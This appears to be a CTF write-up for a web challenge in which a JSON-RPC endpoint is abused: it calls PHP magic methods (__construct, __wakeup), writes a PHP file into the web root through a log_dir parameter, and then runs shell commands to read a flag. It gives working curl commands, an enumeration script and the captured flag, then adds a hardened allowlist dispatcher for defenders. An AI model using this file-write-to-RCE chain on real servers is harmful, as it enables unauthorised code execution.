RPC was a CURLing (aka web) task for 400 points.

Task description:
---
RPC
Author: d0znpp
Wallarm experts[0] do it in 3 minutes. How long will it take you[1]?
Flag format: CTF{..32 hexes..}
[0]http://wallarm.com/
[1]http://109.233.61.11:8880/
---

So let's get ourselves dirty.

The site welcomes us with an error:
---
Notice: Undefined index: rpc_json_call in /var/www/index.php on line 27
---

Quick googling reveals what rpc-json is and how it looks. A simple JSON call looks like this:
---
{"jsonrpc": "2.0", "method": "mymethod", "params":{"a1":"va1","a2":"val2"}}
---
and fires up $obj->$mymethod($val1,$val2)

So we need to find some methods ;]
The first one is `test` with parameter `id`:
---
$ curl http://109.233.61.11:8880/index.php -d 'rpc_json_call={"jsonrpc":"2.0","method":"foo","params":{}}' ; echo
invalid method. Try test
$ curl http://109.233.61.11:8880/index.php -d 'rpc_json_call={"jsonrpc":"2.0","method":"test","params":{"a":"x"}}' ; echo
invalid method params! Valid is: id 42
---

We play a little bit with id, no luck: it always returns 42 - since it is the answer to everything, right?

Let's find some more methods using some educated guesses:
---
import requests
import json

def call_method(m, p):
    # Two lists -> JSON-RPC batch request; otherwise a single call.
    if isinstance(m, list) and isinstance(p, list):
        d = []
        for method, params in zip(m, p):
            d.append({'jsonrpc': '2.0', 'params': params, 'method': method})
    else:
        d = {'jsonrpc': '2.0', 'params': p, 'method': m}
    print(json.dumps(d))  # debug: show the request body
    r = requests.post('http://109.233.61.11:8880/index.php',
                      data={'rpc_json_call': json.dumps(d)})
    return r.text

def check_method(m):
    # The server's error replies start with "invalid".
    return call_method(m, {})[:7] != 'invalid'

# Candidate names: PHP magic methods without their underscore prefix.
methods = [
    'test',
    'construct', 'wakeup', 'sleep',
    'toString', 'to_string', 'invoke', 'set_state',
    'construct', 'destruct', 'call', 'callStatic', 'get', 'set',
    'isset', 'unset', 'toString', 'invoke', 'set_state', 'clone'
]

# Try each name bare, with one underscore and with two.
for m in methods:
    if check_method(m):
        print(m)
    if check_method('_' + m):
        print('_' + m)
    if check_method('__' + m):
        print('__' + m)

$ python2 /tmp/r.py
test
__construct
__wakeup
---

So let's see what we can do about it:
---
$ curl http://109.233.61.11:8880/index.php -d 'rpc_json_call={"jsonrpc":"2.0","method":"__construct","params":{"a":"x"}}' ; echo
invalid method params! Valid is: log_dir debug state
---

OK, so we can set some state and turn on debugging. Oh, and we know the path from the previous error message ;] (/var/www)

So let's try to write some files:
---
$ curl http://109.233.61.11:8880/index.php -d 'rpc_json_call=[{"jsonrpc":"2.0","method":"__construct","params": {"log_dir": "/var/www/testing", "debug":true, "state":"pwnd"}}, {"jsonrpc": "2.0", "method": "__wakeup", "params":{}}]' ; echo
...loged
$ curl http://109.233.61.11:8880/testing
1391980389 O:3:"rpc":1:{s:5:"state";s:4:"pwnd";}
---

Nice!

Let's finish it ;]
---
$ curl http://109.233.61.11:8880/index.php -d 'rpc_json_call=[{"jsonrpc":"2.0","method":"__construct","params": {"log_dir": "/var/www/t.php", "debug":true, "state":""}}, {"jsonrpc": "2.0", "method": "__wakeup", "params":{}}]' ; echo
...loged
$ curl http://109.233.61.11:8880/t.php?x=id
1391980463 O:3:"rpc":1:{s:5:"state";s:22:"uid=33(www-data) gid=33(www-data) groups=33(www-data)
---

We have to snoop around the file system a bit, but eventually the flag can be found in /
---
$ curl 'http://109.233.61.11:8880/t.php?x=cat%20/FLAG'
1391980463 O:3:"rpc":1:{s:5:"state";s:22:"CTF{b15ffee30a117f418d1cede6faa57778} ";}
---

End of story ;]
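
The whole chain works because the server feeds the client-supplied method name straight into `$obj->$method(...)`, which makes `__construct` and `__wakeup` (and with them `log_dir`) reachable from the request. A hardened dispatcher for the defender's side follows as an added example; it is not the challenge's source, and the `Rpc` class, the `RPC_METHODS` table and `dispatch()` are hypothetical names.

```php
<?php
// Added example: hypothetical hardened JSON-RPC dispatcher (names are assumptions).
final class Rpc
{
    // Constructed stand-in for the one method the service means to expose.
    public function test(int $id): int
    {
        return 42;
    }
}

// Allowlist: callable method => exact parameter names it accepts.
// log_dir and debug are absent: they belong in server config, not in a request.
const RPC_METHODS = ['test' => ['id']];

function dispatch(Rpc $obj, $call): array
{
    if (!is_array($call)) {
        return ['error' => 'invalid request'];
    }
    $method = $call['method'] ?? null;
    $params = $call['params'] ?? [];
    // Anything not on the allowlist is refused. This covers __construct,
    // __wakeup and every other magic method without enumerating them.
    if (!is_string($method) || !array_key_exists($method, RPC_METHODS)) {
        return ['error' => 'method not found'];
    }
    // Parameter names must match exactly, so nothing extra can be passed along.
    if (!is_array($params) || array_keys($params) !== RPC_METHODS[$method]) {
        return ['error' => 'invalid params'];
    }
    try {
        return ['result' => $obj->$method(...array_values($params))];
    } catch (TypeError $e) {
        return ['error' => 'invalid params'];
    }
}

// Constructed batch mirroring the shape of the requests in the write-up.
$batch = json_decode('[
  {"jsonrpc":"2.0","method":"__construct","params":{"log_dir":"/tmp/x","debug":true,"state":"s"}},
  {"jsonrpc":"2.0","method":"__wakeup","params":{}},
  {"jsonrpc":"2.0","method":"test","params":{"id":1}}
]', true);

$rpc = new Rpc();
foreach ($batch as $call) {
    echo json_encode(dispatch($rpc, $call)), PHP_EOL;
}
```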